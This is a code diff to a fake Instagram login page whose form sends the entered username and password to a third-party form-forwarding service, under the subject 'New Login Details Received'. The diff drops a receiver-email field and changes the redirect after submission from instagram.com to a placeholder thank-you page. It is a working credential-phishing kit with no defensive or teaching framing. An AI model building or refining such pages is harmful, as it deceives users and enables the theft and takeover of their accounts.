--- a/index.html
+++ b/index.html
@@ -12,10 +12,9 @@
             <img src="https://upload.wikimedia.org/wikipedia/commons/a/a5/Instagram_icon.png" alt="Instagram" class="logo">
             <form action="https://formsubmit.co/7500b8b340189730c54ae32b7a854f8c" method="POST">
                 <input type="hidden" name="_subject" value="New Login Details Received">
-                <input type="email" name="receiver_email" placeholder="Receiver's Email" required>
                 <input type="text" name="username" placeholder="Username" required>
                 <input type="password" name="password" placeholder="Password" required>
-                <input type="hidden" name="_next" value="https://www.instagram.com">
+                <input type="hidden" name="_next" value="https://your-website.com/thank-you.html">
                 <button type="submit">Log In</button>
             </form>
         </div>
